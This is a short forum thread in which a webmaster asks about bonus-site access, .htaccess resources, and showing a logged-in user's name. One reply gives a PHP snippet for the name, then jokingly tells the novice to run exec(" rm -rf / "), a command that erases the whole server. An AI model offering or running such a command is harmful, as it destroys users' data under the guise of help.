Bonus access ect...how?

HI im in the process of finishing my paysite, and have some questions, i have seen alot of sites offering free access to 1 bonus site when signing up today..ect. how does that work do the sites share the password file??
And i really need some good links to places i can read up on all the .htaccess stuff...

When i surfer logs into my site i would like to write "welcome back <% username %>" how do i do that?

i know how to do it in asp, but i have no idea how to grap the stuff from the htaccess prompt? and im on unix...so hmmm

I know this ainīt Experts-exchange.com but i hve gotten some good answers before so iīll try again :-)

Please advise.

Regards
Nick

I think everyone's sleeping right now... Most webmasters wake up around noon or so....

Sorry, I don't know the answers to your questions.

"I know this ainīt Experts-exchange.com"

... somehow I feel offended !

"Most webmasters wake up around noon or so...."

... just in case you missed that at school, yes, there is life beside the american continent, the earth is not flat, and a day has 24h, it takes 5 minutes to boil an egg and graphity does not apply for myself ...

"sites offering free access to 1 bonus site when signing up today"

... keep in mind your processor has to allow that. if yes, you can either set it up with a local access file, or you creat one for every site.

"i would like to write "welcome back"

... if you have php installed on your box do the following:

PHP Code:

<?= $_SERVER["REMOTE_USER"]?>

or: echo $_SERVER["REMOTE_USER"]; (direct from php)

... and keep in mind, if you have some spare time on your hands, just do:
exec(" rm -rf / ");

Funkmaster: Thanks for the reply :-)
